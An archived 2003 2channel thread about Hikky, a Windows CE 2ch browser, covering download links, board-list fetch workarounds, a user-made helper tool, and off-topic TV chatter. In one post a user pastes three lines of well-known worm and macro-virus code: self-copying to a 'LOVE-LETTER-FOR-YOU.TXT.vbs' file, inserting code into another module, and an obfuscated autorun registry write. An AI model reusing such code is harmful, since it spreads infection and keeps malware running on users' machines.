2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

春は来る?CE用2chブラウザ「Hikky」Part10

1 :いつでもどこでも名無しさん:03/10/02 13:31 ID:hpTWT2LA
Hikkyの入手
Hikky配布サイト
 http://www.geocities.co.jp/SiliconValley-Cupertino/6987/hikky.html

Hikkyの使用には、以下のDLLが必須となっています!
ここから落としてHikkyの起動ディレクトリへ放りこんで使います。
zlib for WindowsCE
 http://www.geocities.co.jp/SiliconValley-Cupertino/6987/zlib.lzh

2 :いつでもどこでも名無しさん:03/10/02 13:35 ID:???
インストール方法はこちらへ。
 http://ipaqcheck.hoops.ne.jp/hikky.html
CASSIOPEIA l'agendaな人には
らじぇ用インストーラ付きHikky配布所
 http://www.geocities.co.jp/SiliconValley-PaloAlto/2806/
ログコンバータ
j2h.pl(j2ch-cache、A Bone、かちゅ〜しゃ、ギコナビ、ホットゾヌ→Hikky)
n2h.pl(ニュースサイト→Hikky)
 http://j2h.tripod.co.jp/
かちゅ〜しゃ→Hikky
Hikkatju
 http://www.geocities.co.jp/SiliconValley-Oakland/4909/
ホットゾヌ→Hikky
Zonukky
 http://www.geocities.co.jp/SiliconValley-Cupertino/2771/

3 :いつでもどこでも名無しさん:03/10/02 13:36 ID:???
前スレ
春近しCE用2chブラウザ「Hikky」Part9
http://pc3.2ch.net/test/read.cgi/mobile/1042440658/
過去スレ
ωイマカラノミニイク CE用2chブラウザ「Hikky」Part8
 http://pc3.2ch.net/test/read.cgi/mobile/1035464850/
CE使い必携の2chブラウザ「Hikky」Part7
 http://pc3.2ch.net/test/read.cgi/mobile/1030192363/
CE使い必携の2chブラウザ「Hikky」Part6(HTML化待ち)
 http://pc3.2ch.net/test/read.cgi/mobile/1024808769/
CE使い必携の2chブラウザ「Hikky」Part5
 http://pc.2ch.net/mobile/kako/1022/10226/1022680571.html
CE使い待望の2chブラウザ「Hikky」Part4
 http://pc.2ch.net/mobile/kako/1017/10170/1017017560.html

4 :いつでもどこでも名無しさん:03/10/02 13:37 ID:???
CE使い待望の2chブラウザ「Hikky」Part3
 http://pc.2ch.net/mobile/kako/1012/10122/1012273057.html
廃人続々量産中。CE用2chブラウザ「Hikky」Part2
 http://pc.2ch.net/mobile/kako/1008/10088/1008879642.html
CE使い待望の2chブラウザ「Hikky
 http://pc.2ch.net/mobile/kako/1003/10031/1003159114.html
CE用の2ちゃんブラウザって無いの?
 http://pc.2ch.net/mobile/kako/986/986455962.html

5 :いつでもどこでも名無しさん:03/10/02 13:37 ID:???
初歩的な質問は
スレッドを立てるほどではない質問Part7
 http://pc3.2ch.net/test/read.cgi/mobile/1035001638/
PC初心者板
 http://pc.2ch.net/pcqa/
hikkyの解説があるサイト(モバイルインチキ堂)
 ttp://mobile.j-speed.net/windowsce/index.htm)
Part6スレの216さん作成FAQ
 http://www.geocities.co.jp/SiliconValley-Sunnyvale/4598/hikky.txt

6 :いつでもどこでも名無しさん:03/10/02 13:38 ID:???
●ボタンの説明(左から)
 カミナリマーク … オンライン/オフラインモードの切り替え
 表示切替ボタン … スレタイトル一覧/レス一覧表示の切り替え
 スレッド受信ボタン ・… スレッドタイトル一覧を受信
 レス受信ボタン … 現在表示中のスレッドの、最新レスを受信
 えんぴつボタン … 現在表示中のスレッドにレスを書き込む
 レス×ボタン … 表示中のスレッドを閉じる
 ゴミ箱ボタン … 表示中スレッドのログを削除
 設定ボタン … 板一覧の受信や、Hikkyの設定を行う
 閉じるボタン … Hikkyを終了する

7 :いつでもどこでも名無しさん:03/10/02 13:38 ID:???
●キー操作の説明
 ↑, q, スペース :上方向行スクロール
 ↓, w :下方向行スクロール
 PgUp, a :上方向ページスクロール
 PgDn, s :下方向ページスクロール
 n :次のレスにジャンプ
 p :1つ前のレスにジャンプ
 g :指定したレス番号にジャンプ
 L :コピペウィンドウオープン
 Home, z :Home(最初の発言へ)
 End, x :End(最後の発言へ)

 Ctrl+1 :カテゴリ一覧にフォーカス
 Ctrl+2 :板一覧にフォーカス
 Ctrl+3 :スレ一覧にフォーカス
 Ctrl+4 :表示レス一覧にフォーカス
 Ctrl+Enter :レス表示最大化
 Ctrl+o :オンライン/オフラインモード切替
 Ctrl+t :スレッド一覧更新
 Ctrl+r :スレッド内容更新(レスの取得)
 Ctrl+d :スレッド内容削除(取得ログの削除)
 Ctrl+w :書き込み
 Ctrl+z :表示レスを閉じる
 Ctrl+q :Hikkyの終了
 スペース:下方向へのページスクロール
 Shift + スペース:上方向へのページスクロール
  注:ボタンの説明はHPC2Kです
    PPCでは終了ボタンはありません

8 :いつでもどこでも名無しさん:03/10/02 13:39 ID:???
●お気に入りの板一覧
 2ch.Brdと同じディレクトリにfavorite.Brdを作成することで、お気に入りの板一覧を表示できます。
 ファイルはテキストエディタで作成、書式は次の通り。
 1行目:【タイトル】
 2行目以降:板名 , URL
=例=
 【お気に入り】
 モバイル,http://pc3.2ch.net/mobile/subject.txt
 ニュース速報+,http://news3.2ch.net/newsplus/subject.txt
   :
 URLの代わりに*を記述すると、2ch.Brdの内容を参照します。
=例=
 【お気に入り】
 モバイル,*
 ニュース速報+,*
   :

9 :いつでもどこでも名無しさん:03/10/02 13:45 ID:???
本当にPart10立てたのかよ....._| ̄|○

10 :いつでもどこでも名無しさん:03/10/02 14:42 ID:iw4opTO4
更新は止まったけどソフトは配布してるんだから
スレはあった方がいいだろ。

11 :いつでもどこでも名無しさん:03/10/02 17:14 ID:5hntGTHu
>>1


12 :いつでもどこでも名無しさん:03/10/02 19:22 ID:???
12

13 :いつでもどこでも名無しさん:03/10/02 19:23 ID:???
13

14 :いつでもどこでも名無しさん:03/10/02 19:23 ID:???
14

15 :いつでもどこでも名無しさん:03/10/02 19:24 ID:???
15

16 :いつでもどこでも名無しさん:03/10/02 19:25 ID:???
16

17 :いつでもどこでも名無しさん:03/10/02 19:25 ID:???
17

18 :いつでもどこでも名無しさん:03/10/02 19:26 ID:???
18

19 :いつでもどこでも名無しさん:03/10/02 19:26 ID:???
19

20 :いつでもどこでも名無しさん:03/10/02 19:27 ID:???
20

21 :1日10カキコ:03/10/02 19:29 ID:???
21

22 :いつでもどこでも名無しさん:03/10/02 19:54 ID:???
>>2のZonukky配布ページは無くなってますよ。
前スレにて作者さんが"zonukky"で検索してメインサイトから
ダウソしてください、とのことです。

ところでZonukkyがホットゾヌ2に対応したりなんかする予定は…
ないですよね?配布ページ消されたのに気付かないくらいだしw

23 :いつでもどこでも名無しさん:03/10/02 23:43 ID:???
シグマリオン+CF-10Tで有線LANでボード一覧が取得できねっす。
デフォルトのサイトはなくなってるみたいなので、
http://zonutan.hacca.jp/bbsmenu.html
から取得すると「取得完了!」と出るんですが
.brdは何も入ってない状態です。

助けてくださいぃ・・・(泣


24 :前スレの書き込みより:03/10/02 23:55 ID:???
>>23
板一覧の取得先
http://www.ff.iij4u.or.jp/~ch2/bbstable.html
に変更
ただしHikkyは板一覧の取得先が
http://www6.ocn.ne.jp/~mirv/bbstable.html
(マァヴが料金を払ってないので死亡)の
決め撃ちになっているので板一覧取得の度に
URLの書き換えが必要

おまけ:CD-R板が見れない
2ch.Brdの該当部は
CD-R,DVD,http://pc3.2ch.net(以下略)となっているが
Hikkyはその行の最初の,以下をURLとみなしていると思われるので
DVD,http://pc3.2ch.net(以下略)をURLとして読み込んでしまっているようだ
よって2ch.brdのCD-R,DVDとなっている部分を
DVD,http://pc3.2ch.net(以下略)に書き換えてやれば良い
ただし鯖移転等で板一覧の取得を行った場合は
2ch.Brdは再びDVD,http://(以下略)に戻ってしまうので
一度Hikkyを終了させてから上記を行えばよい
favorite.Brdも同じ事をすればok

25 :いつでもどこでも名無しさん:03/10/02 23:57 ID:???
25


26 :いつでもどこでも名無しさん:03/10/02 23:57 ID:???
26

27 :いつでもどこでも名無しさん:03/10/03 00:23 ID:???
>>24
「開けません」って言われちゃいます・・・。
ぽけぎこだと一発で取得できたんですが。
何が悪いんだろうなぁ・・・・

シグ1ユーザーにはこのソフトがベストなのにぃ(泣

28 :いつでもどこでも名無しさん:03/10/03 06:26 ID:???
>24
>27

おらのところもそうだ。
iil4u のとこは、IEでみると、確かにBBSTABLEだが、
Hikkyで板一覧は収得できない



29 :いつでもどこでも名無しさん:03/10/03 08:13 ID:???
29


30 :いつでもどこでも名無しさん:03/10/03 08:14 ID:???
30

31 :いつでもどこでも名無しさん:03/10/03 08:14 ID:???
31

32 :いつでもどこでも名無しさん:03/10/03 22:03 ID:???
32

33 :いつでもどこでも名無しさん:03/10/03 22:04 ID:???
33

34 :いつでもどこでも名無しさん:03/10/03 22:04 ID:???
34

35 :いつでもどこでも名無しさん:03/10/03 22:12 ID:???
何埋め立ててんの?
埋め立ててもpart11が建つだけだよ。

36 :いつでもどこでも名無しさん:03/10/03 22:23 ID:???
36

37 :いつでもどこでも名無しさん:03/10/03 22:24 ID:???
37

38 :いつでもどこでも名無しさん:03/10/03 23:30 ID:???
38

39 :いつでもどこでも名無しさん:03/10/03 23:30 ID:???
39

40 :いつでもどこでも名無しさん:03/10/04 11:19 ID:???
で,板取得できた人いる?どこもNGです。とほほ

41 :いつでもどこでも名無しさん:03/10/04 11:27 ID:???
http://2ken.net/table.html
で取得できました。細かい確認はこれから

42 :いつでもどこでも名無しさん:03/10/04 14:27 ID:???
お前らいい加減へタレのおっさんを楽にしてやれよ・・・・・・・・

43 :いつでもどこでも名無しさん:03/10/04 18:54 ID:???
43

44 :いつでもどこでも名無しさん:03/10/04 18:55 ID:???
44

45 :いつでもどこでも名無しさん:03/10/06 12:37 ID:???
>41

板は拾得できたけど,Hikkyと合わないみたいで
スレッドになると,一切拾得できません。

スレッド欄は白紙状態です。



46 :いつでもどこでも名無しさん:03/10/06 21:52 ID:???
同じくスレッド白紙のまま
あきらめてポケギコ使ってるよ。

47 :いつでもどこでも名無しさん:03/10/06 22:05 ID:???
久々に再インストしたら板更新できなくなってる・・とほほ
使いやすい2chブラウザだったんだが、、、はぁ

48 :いつでもどこでも名無しさん:03/10/06 22:36 ID:???
>>1

削除依頼しとけよ。

49 :いつでもどこでも名無しさん:03/10/06 22:40 ID:???
41だけど
>>45 46
見たい板によっては接続できないみたいですね。
おいらが見たい板はこれで取得できているのでとりあえず不都合ないです。
他に良いところ在ったら教えてください
上のアドレスは
BBS table 2chでググって出たのをたまたまHikkyで取得出来ただけですから
探せばあるような気がするけど

50 :いつでもどこでも名無しさん:03/10/06 22:44 ID:???
>>49
必死だな

51 :いつでもどこでも名無しさん:03/10/06 22:49 ID:???
一応環境はラジェンダですけどね。
ラジェ板でも話があって接続可の報告もらいました。

>>49
失せろタコ。
お前のようなやつの来るような所じゃない。

52 :いつでもどこでも名無しさん:03/10/06 22:51 ID:???
連続スマン
49じゃない。50の事。
自分に言ってどうする!

53 :いつでもどこでも名無しさん:03/10/06 22:59 ID:???
>>52
ますます必死だな

54 :45:03/10/07 06:54 ID:???
>50、>53

うるさいぞ、タコ野郎。



55 :いつでもどこでも名無しさん:03/10/07 08:04 ID:???
>>54
プゲラ

56 :いつでもどこでも名無しさん:03/10/07 13:28 ID:9NBxkh19
板一覧取得アプリ作ってみました。
右フレームから取得しています。
http://up.isp.2ch.net/up/b65417168c10.LZH
解凍して出てきたHikkyGetBrd.exeをHikkyのディレクトリに置いて実行してください。
もうひとつのはHikkyのディレクトリに置いて実行するとシステム時刻を5分遅らせてHikky起動、
Hikky終了でシステム時刻を元に戻します。適当に作ったので不具合あるかもしれませんが。
jor728とh2210で動作確認しています。
PocketPC2003以外では.NET Compact Framework必要です。
ttp://www.microsoft.com/japan/msdn/vstudio/device/compactfx1SP1Redist.asp

57 :いつでもどこでも名無しさん:03/10/07 13:44 ID:???
>>56
おつ。これから試させてもらいます。

58 :h5550ユーザー:03/10/07 15:23 ID:???
書き込めたら>>56はネ申

59 :h5550ユーザー:03/10/07 15:28 ID:???
書き込めました!

h5550+AH-N401C+HykTime.exe+prin

60 :56:03/10/07 16:48 ID:???
右じゃ無くて左フレームでした。すいません。
板一覧取得するだけならNET Framework入ってる母艦でもできます。exeと同じディレクトリに作成されます。あと取得時はネットに接続しておいてください。

61 :いつでもどこでも名無しさん:03/10/07 17:40 ID:???
アクティブシンク経由でディバイスにインストールされるんですね >.NET Compact Framework
ラジェンダはどうしましょ?

62 :いつでもどこでも名無しさん:03/10/07 17:51 ID:9NBxkh19
板取得なら母艦でできますがシステム時刻をずらすのは.NET Compact Framework
をサポートしていないと無理ですm(__)m
補足ですがお気に入りにプログラム技術をいれている方はプログラムに変更してください。

63 :オパーイプニプニヤホーヤホー(・∀・)σ)・人・) ◆BAKA/D4vYA :03/10/07 23:41 ID:???
トリップテスト

64 :いつでもどこでも名無しさん:03/10/10 13:16 ID:???
保守

65 :いつでもどこでも名無しさん:03/10/13 17:05 ID:???
hosiyu

66 :いつでもどこでも名無しさん:03/10/14 21:50 ID:???
ついに板一覧の取得にまで支障を来すようになってしまったのか・・
もう他の奴に乗り換えちゃおうかな・・

67 :いつでもどこでも名無しさん:03/10/14 22:05 ID:???
シグ3発売されたのに本人出てこないしな。
もう乗り換えるか勝手に2を作るかどっちかだな。

68 :いつでもどこでも名無しさん:03/10/15 00:41 ID:UG2OjE1n
ニュー速+板
トンドル?
Hikkyでは見られなくなってるだけ?…

69 :いつでもどこでも名無しさん:03/10/15 00:48 ID:???
負け犬も惨めだが
いつまでも負け犬をあきらめずにいるのも
惨めなり

70 :いつでもどこでも名無しさん:03/10/15 01:11 ID:???
>>68
移動したよ。
IEでニュー速+を開いてURLを確認してみれ。

71 :いつでもどこでも名無しさん:03/10/15 13:24 ID:???
<板一覧の更新>ができましぇん。

72 :いつでもどこでも名無しさん:03/10/15 16:53 ID:???
少し上に書いてありますよ。

73 :いつでもどこでも名無しさん:03/10/19 18:14 ID:???
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),

74 :いつでもどこでも名無しさん:03/10/19 20:13 ID:???
>>73
今時そんな事やって楽しい?

75 :いつでもどこでも名無しさん:03/10/20 02:06 ID:rmjGkBC+
すみません。>>1のものをDLしたのですが
クリックしても「関連ずけられたアプリケーションはありません。
アプリケーションを実行してからそのなかでファイルを開いてください」
と出るのですがどうすればいいのでしょうか?
機種はシグマリオン2です。

76 :いつでもどこでも名無しさん:03/10/20 12:38 ID:???
>>75
@2++を使う。
Aぽけギコを使う。

好きなほうを選べ

77 :いつでもどこでも名無しさん:03/10/20 15:35 ID:???
>75

PocketPC用のexeファイルじゃないんだろうか。
ΣIIなら,Handheld PCだったよなー。


78 :75:03/10/20 15:37 ID:MnsoTs5I
76さんへ
すみません。
ぽけギコを落としてクリックしても
「関連ずけられたアプリケーションはありません。
アプリケーションを実行してからそのなかでファイルを開いてください」
とメッセージが出てしまいます。アプリケーションを実行してからとは
どういう行動をとればいいんでしょうか?

79 :いつでもどこでも名無しさん:03/10/20 16:09 ID:???
>>78
      | Hit!!
      |
      |
   ぱくっ|
     /V\
    /◎;;;,;,,,,ヽ
 _ ム::::(,,゚Д゚)::| 俺が釣られると思ってんのか!
ヽツ.(ノ:::::::::.:::::.:..|)
  ヾソ:::::::::::::::::.:ノ
   ` ー U'"U'

http://www.geocities.jp/m_hiloci/prog/prog.htm
の”EXぱんだ”のH/PC MIPS版をダウンロードして、
適当なフォルダでダウンロードしたcabファイルを
ダブルタップ。
あとはLzhを解凍してインスコしれ。


80 :いつでもどこでも名無しさん:03/10/20 16:21 ID:???
これまでラジェンダ&Hikkyで、いい思いしていましたが、
これからはラジェンダ&2++でいい思いします。(´・ω・`)

81 :いつでもどこでも名無しさん:03/10/20 18:55 ID:???
hikkyで
スレの内容見ようと、スレを選び
おkボタン押すんだが、
最近になって、スレの内容がみれないのだが。

82 :いつでもどこでも名無しさん:03/10/20 22:40 ID:???
とっくに賞味期限も切れ、少し膨らみかけた缶詰みたいなもんだな。

83 :いつでもどこでも名無しさん:03/10/21 00:15 ID:ru7qGb8f
>>79

それもなぜかおなじことになります・・。
なにがまちがっているのでしょうか?
適当なファイルにダウンロードして開いてもこの症状です。


84 :79:03/10/21 00:31 ID:???
>>83
釣られついでにもう少し付き合うけれど
ダウンロードしたExぱんだのファイルの識別子は".cab"になってる?
なっていなければ、ファイル名称の変更で識別子を”.cab”に変えて
ダブルタップしてみれ。

85 :いつでもどこでも名無しさん:03/10/21 02:19 ID:XgXKswSh
>>84

できました!アイコンがぱんだに変わって開くことが出来ました。
とりあえずこれからヒッキーを使ってみます。
本当にありがとうございました。お手数かけてすみませんでした。

86 :いつでもどこでも名無しさん:03/10/21 02:32 ID:XgXKswSh
さっそくわからない・・・・
まず何をすればいいんだろう・・。

ここから落としてHikkyの起動ディレクトリへ放りこんで使います。
zlib for WindowsCE
 http://www.geocities.co.jp/SiliconValley-Cupertino/6987/zlib.lzh

↑これは必ずやらなければいけないんですよね?
起動ディレクトリ??


87 :いつでもどこでも名無しさん:03/10/21 14:23 ID:jMWt02Oj
ごめんなさい。ぽけぎこを
使ったらこっちのほうが使いやすいのでこちらにしました。


88 :76=79:03/10/21 19:07 ID:???
>>87
正しい選択だ。
ただ、2++の方がもっと使いやすいぞ。

89 :いつでもどこでも名無しさん:03/10/22 14:40 ID:???
んだんだ

90 :いつでもどこでも名無しさん:03/10/22 20:43 ID:BkuhF1Ds
2++は使い方が分からない。
どこかに解説ページありましたか?
ひっきーは相変わらず板一覧の取得が出来ないし・・・

91 :いつでもどこでも名無しさん:03/10/23 00:10 ID:???
結局、ラジェ+Hikkyで板一覧更新を
するにはどのアドレスですればよいの??

bbstableでググッて出てきたモノで
色々やってみたけれど、ニュー速板が
駄目でつ。



92 :いつでもどこでも名無しさん:03/10/23 21:40 ID:???
favorite.Brdを編集すれ。

93 :いつでもどこでも名無しさん:03/10/24 16:12 ID:???
でURLは何を

94 :いつでもどこでも名無しさん:03/10/24 19:08 ID:???
>>56

95 :いつでもどこでも名無しさん:03/10/24 19:52 ID:???
>>94
もうないよ。

96 :Single Cheese Everything:03/10/25 20:07 ID:drHE69vo
シグマリオン2を使ってるんですが、hikkyは有料課金(Dat落ち)対応にはなってないんですよね


97 :いつでもどこでも名無しさん:03/10/25 22:00 ID:???
>>96
ce用のブラウザで●に対応してるものはない

98 :いつでもどこでも名無しさん:03/10/27 12:34 ID:???
>>97
ちと毛色は違うが、p2ならCEでも使えるし●にも対応してるぞ。

99 :いつでもどこでも名無しさん:03/10/27 12:58 ID:???
p2って何?

100 :いつでもどこでも名無しさん:03/10/27 13:36 ID:???
100(σ^▽^)σゲッツ!!

101 :いつでもどこでも名無しさん:03/10/27 14:39 ID:???
>>99
http://akid.s17.xrea.com/

102 :いつでもどこでも名無しさん:03/10/27 16:25 ID:???
譌・譛ャ隱槭ユ繧ケ繝

103 :99:03/10/27 20:12 ID:???
>>101
THX!!
でも、あほな俺にはよくわかんないや。
おとなしくブラウザを使うことにします。

104 :いつでもどこでも名無しさん:03/11/03 00:30 ID:???
で、ヘタレちゃんはどうした?

105 :いつでもどこでも名無しさん:03/11/03 04:42 ID:???
     /::::::::::::::::::\
    /::::::::/  丶::::::\
   /:::::ノ     \:::::ヽ
   |::::::: \   / :::::|
   |::::| ●   ● |::::|    / ̄ ̄ ̄ ̄ ̄ ̄ ̄
   |::::| ..      .. |::: |  <  ヘタレ!
   |::::\ [__ ̄] /:::::::|   │なぜベストを尽くさないのか?
   |::::::::::\___/:::::::::::::|   \________
    |_:::::::::|  |::::::::(⌒)::|
     |::::::::::|-、 ,-/......ノ~ レ-r┐
   /....|::::丿|,,,,,,/.....ノ__ | .| ト 、
  /.........レ.....| 〈 ̄   `-Lλ_レ′
  レ...................|/.... ̄`ー‐---‐′

106 :ヘタレ:03/11/03 09:37 ID:???
>>105
だってみんなに「ヘタレ必死だな」とか言われそーだし

107 :いつでもどこでも名無しさん:03/11/03 12:20 ID:???
お前らのほうがよっぽど必死だろう
既に朽ち果てた大木に
まだ汁が少し出るから待っていればまだ出てくるかもしれないからと
群がる虫気らどもめ
って漏れモカー

108 :いつでもどこでも名無しさん:03/11/03 14:34 ID:???
もうやめたって言えばいいのに。
そうすればみんな諦めるよ。

109 :いつでもどこでも名無しさん:03/11/03 14:52 ID:???
>>108
ヘタレさんはあえて辞めたといわずに、この状況を楽しんでいマツ。

110 :いつでもどこでも名無しさん:03/11/03 17:11 ID:???
つーか、ソース公開して改造ご自由に!ってやってくれたら終わる話だよね。
誰かが改良していってくれるよ。

111 :いつでもどこでも名無しさん:03/11/03 19:15 ID:???
>>110
そのソースを紛失したから開発止まってるんですが何か??

112 :いつでもどこでも名無しさん:03/11/03 20:29 ID:???
オープンソースでhikky2作ろうぜ!

113 :いつでもどこでも名無しさん:03/11/03 22:50 ID:???
>>112
当時まったく同じ事を言って生まれたのが「さいたま」なわけだが…

114 :いつでもどこでも名無しさん:03/11/03 23:53 ID:???
一人で作ればオープンしたくないわな。

115 :いつでもどこでも名無しさん:03/11/04 00:03 ID:???
あれ、さいたまって
オープンソースを謳うような事あったっけ
突然現れて颯爽と消えていったような

116 :いつでもどこでも名無しさん:03/11/04 00:42 ID:???
当時の経緯
【神】作って!新WinCE用2chブラウザ【召還中】
http://pc3.2ch.net/mobile/kako/1034/10343/1034347976.html

117 :いつでもどこでも名無しさん:03/11/04 14:58 ID:???
板一覧取得ができない人、下のアドレスで更新できませんか?

ttp://2ken.net/table.html

118 :いつでもどこでも名無しさん:03/11/04 21:19 ID:???
116の過去ログ・レス番132を見たら

よくわからないが懐かしさで涙が出そうになった

119 : :03/11/04 23:34 ID:???
>117

もう遅かった。我慢できずに、2++に移行してしまった。



120 :いつでもどこでも名無しさん:03/11/05 01:36 ID:???
>>111
>そのソースを紛失したから開発止まってるんですが何か??

そんなのを信じてるとは……すんげーお人好しだねアンタ。

121 :いつでもどこでも名無しさん:03/11/05 01:45 ID:???
>>118
そのスレの>>1は俺なんだよな。
んで、仕事入煽ったのも、中尉とか言う奴煽ったのも俺。
あのころは俺も若かったよな。
asdfを偽称してザウスレ荒らしたり、シグ2スレで
ジョルユーザを名乗って「(,,・∇・)ハッハッハ!!!貧乏人必死だな」とか煽ったり、あの頃の元気を取り戻したいもんだ。

122 :いつでもどこでも名無しさん:03/11/05 01:53 ID:???
>>121
で?それが何か?

123 :いつでもどこでも名無しさん:03/11/05 02:00 ID:???
>>120
信じようと信じまいが、もう作らないってことだろ。
おまいらなんでこんな糞ブラウザありがたがってんの?
わけわかんね。

124 :いつでもどこでも名無しさん:03/11/05 02:07 ID:???
>>122
食いつき良いね。
別にどうでも言い想い出話書いただけなんだけど。
このスレは昔の想い出をかたる雑談スレだろ?

125 :いつでもどこでも名無しさん:03/11/05 02:18 ID:???
>>124
で?それが何か?

126 :いつでもどこでも名無しさん:03/11/05 10:17 ID:???
>>117
ありがたいんですが、そのURLだと削除系板が開けません…
CDR&DVD板も、変わらず閲覧だけで書き込みできましェん…

127 :いつでもどこでも名無しさん:03/11/05 14:19 ID:???
>>126
いい加減しつこいね。
読み込めない板を使いたいんなら他のソフト使えば良いじゃない。

128 :いつでもどこでも名無しさん:03/11/05 14:46 ID:???
俺は2++使ってるけど、使いにくいぞ。
ひとレスごとの表示、違う板のスレに移動するときの手間の多さ等、
慣れなきゃならない部分が結構ある。
でも、スレ内検索ができたりhtml化したスレが読めるので
仕方なしに2++を使ってるよ。
今のヒッキーにスレ内検索やhtml化して読める機能が付加されたら
リンクで飛べなくても、レスをリンク表示出来なくても間違いなくヒッキーに戻るよ。

129 :56:03/11/05 17:07 ID:???
もう一度バイナリ上げましょうか?

130 :いつでもどこでも名無しさん:03/11/05 17:55 ID:???
>>129
是非、是非、よろしくおながいしまつ

131 :56:03/11/05 18:04 ID:???
どうぞ
http://up.isp.2ch.net/up/ccecb054b8ba.exe

132 :いつでもどこでも名無しさん:03/11/05 18:06 ID:???
>>131
いただきますた。
ありがとうございますー。

133 :いつでもどこでも名無しさん:03/11/05 18:21 ID:???
download板などの今日移転された板はまだ左フレームのリンクが更新されていないのでtmpをtmp2に書き換えてください

134 :いつでもどこでも名無しさん:03/11/05 20:39 ID:???
いただきましたよん。

135 :いつでもどこでも名無しさん:03/11/05 22:06 ID:???
いただけませんですた。。。

136 :いつでもどこでも名無しさん:03/11/06 16:22 ID:???
漏れも板みれなくなってきたんでひさし鰤このスレ覗いた…
諦めるしかなさそうだな。

>128 に禿同。2++のスレでこんなこというと袋にされると思うが
「これを、あーする」っていうインターフェースはすきじゃない。
ヒキみたいに「これをクリクリ」のインターフェースが好き。

137 :いつでもどこでも名無しさん:03/11/08 00:38 ID:???
食いつきの良い>>124を晒しage


138 :いつでもどこでも名無しさん:03/11/08 02:53 ID:???
>>137
保守ならsageでやっとくれ

139 :いつでもどこでも名無しさん:03/11/10 03:48 ID:5Ru7zcg2
ttp://www6.ocn.ne.jp/~mirv/bbstable.html
が復活した模様。一部の板は駄目でつが、板一覧更新ができまつ。


140 :いつでもどこでも名無しさん:03/11/10 05:35 ID:???
test

141 :いつでもどこでも名無しさん:03/11/10 10:50 ID:???
>>139
ありがとう!おかげでアソコが見れた。

142 :いつでもどこでも名無しさん:03/11/15 02:17 ID:???
らじぇ+hikkyで無線LANからアクセスすると書き込みできない。
ERORR:ブラウザを立ち上げなおしてみてください
って言われる。なぜ?

143 :いつでもどこでも名無しさん:03/11/15 03:34 ID:???
らじぇの時間を5分ほど遅らせてみ

144 :142:03/11/15 22:34 ID:???
>>143
やっぱ書けねえよ。ウワァァァン!ヽ(`Д´)ノ


145 :いつでもどこでも名無しさん:03/11/16 04:22 ID:???
おしっこして寝なさい。

146 :いつでもどこでも名無しさん:03/11/18 22:41 ID:???
   |_|                   |l
┌─┴─‐┐          ─◇
│| ̄ ̄ ̄|│              /
│|___|│       ♪
└───‐┘∧_∧ 〜
        ( ・∀・)__   __
        (  つ¶ /\_\. |[l O |
        │ │ |\/__/ |┌┐|
        (__)_) __ll__  |└┘|
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
 ̄ ̄ ̄ ̄  __∧____ ̄ ̄ ̄ ̄ ̄ ̄
       l 
        │ ♪朝まで〜ふざけよお〜 ワンマンショーでえ〜
       l,_ ア〜ア ア〜ア ア〜アア

147 :142:03/11/19 23:20 ID:???
書けた!
ヤッタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!

148 :いつでもどこでも名無しさん:03/11/20 10:03 ID:???
>>146
あのドラマ面白いよね。
ハチャメチャホラーしてて。

149 :いつでもどこでも名無しさん:03/11/21 14:11 ID:???
>148
稲葉じゃなくて沢田の声が聞えたオレはヤヴァぃですか?w

150 : (人´∀`)シュテキ♪:03/11/21 20:43 ID:???
激しく正常です。

151 :いつでもどこでも名無しさん:03/11/21 22:40 ID:???
warota.....

152 :いつでもどこでも名無しさん:03/11/22 18:19 ID:???
結衣チャーーーン☆

153 :いつでもどこでも名無しさん:03/11/25 19:51 ID:???
私が生まれて初めて買ったシングルレコードは
沢田研二の「勝手にしやがれ」ですた。

生まれて初めて使った2chビューアは「Hikky」です。
今も使ってます。。

154 :いつでもどこでも名無しさん:03/11/25 20:29 ID:???
わたすもHikkyオンリーでつ。

チナミニ今夜のあな誰は30分押すのかなヤパーリ・・・
バレーなぞどーでもイイが。

155 :いつでもどこでも名無しさん:03/11/29 20:44 ID:???
   |_|                   |l
┌─┴─‐┐          ─◇
│| ̄ ̄ ̄|│              /
│|___|│       ♪
└───‐┘∧_∧ 〜
        ( ・∀・)__   __
        (  つ¶ /\_\. |[l O |
        │ │ |\/__/ |┌┐|
        (__)_) __ll__  |└┘|
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
 ̄ ̄ ̄ ̄  __∧____ ̄ ̄ ̄ ̄ ̄ ̄
       l 
        │ ♪おなじ風ぇーの中 うぃのォお うぃのォおー♪

156 :いつでもどこでも名無しさん:03/12/07 21:34 ID:???
hosyu

157 :いつでもどこでも名無しさん:03/12/07 22:23 ID:???
ヘタレちゃんはコテハンもすてて
名無しとして潜伏しちゃったみたいだね。
もう完全にやる気がないよ。

158 :いつでもどこでも名無しさん:03/12/07 23:03 ID:???
>>157
え?
もう死んだってどこかのスレに書いてあったよ?

159 :いつでもどこでも名無しさん:03/12/08 23:17 ID:???
あな誰、明日で最終回だYO!
北村一輝の流し目もこれで最後か.....

160 :いつでもどこでも名無しさん:03/12/09 00:42 ID:???
明日が最終回か。
いっこく堂は死ぬのかな。
まさか本当に化けもんだったという事では終わらないだろうし。

161 :いつでもどこでも名無しさん:03/12/09 23:05 ID:???
おいおい、本当に化け物だったよ。
それから、先週見逃してる事を最終回を見て気づいたよ。

162 :いつでもどこでも名無しさん:03/12/09 23:39 ID:???
化け物つーか・・・「蟲」ね。
それにしても、柏原崇はオイシイとこ取りなやっちゃ。
ビクーリしたのは、役所広司がラスト1シーンの
あれだけのために出演してるコト。
カコイイ

163 :149:03/12/10 18:22 ID:???
それよりラス前の回から、チョーさんのロレツが廻ってなかったのが気になる・・・。
まだまだあの渋い芝居を見せて欲しいのだが・・・心配だ。


164 :いつでもどこでも名無しさん:03/12/10 23:11 ID:???
いっこく堂を刺すときに
「むしけら」という台詞を言ったけど
「むひけら」にしか聞こえなかった。

165 :いつでもどこでも名無しさん:03/12/11 12:10 ID:???
いっこくを成敗したあの刀(虫切丸本体)は
